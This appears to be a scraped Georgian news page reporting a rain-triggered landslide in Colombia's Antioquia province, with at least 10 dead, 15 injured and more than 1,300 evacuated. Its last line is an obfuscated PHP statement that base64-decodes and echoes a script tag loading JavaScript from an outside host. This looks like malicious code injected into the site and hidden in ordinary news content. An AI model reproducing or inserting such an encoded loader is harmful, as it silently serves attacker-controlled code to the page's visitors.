gorgia
გარე ავეჯი

კოლუმბიის ჩრდილო-დასავლეთ ნაწილში მეწყრის შედეგად სულ მცირე 10 ადამიანი დაიღუპა და 15 დაშავდა. ინფორმაციას ანტიოკიას პროვინციის გუბერნატორი ავრცელებს.

გუბერნატორმა ანდრეს ჯულიანმა X-ზე გამოქვეყნებულ პოსტში განაცხადა, რომ სამძებრო-სამაშველო სამუშაოები ამ დრომდე გრძელდება და გარდაცვლილთა რიცხვი, შესაძლოა, გაიზარდოს.

როგორც ადგილობრივი მედია წერს, მეწყერი ძლიერმა წვიმებმა გამოიწვია.

სტიქიის გამო, აუცილებელი გახდა რეგიონში მცხოვრები 1 300-ზე მეტი ადამიანის თავშესაფარში გადაყვანა.

71
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");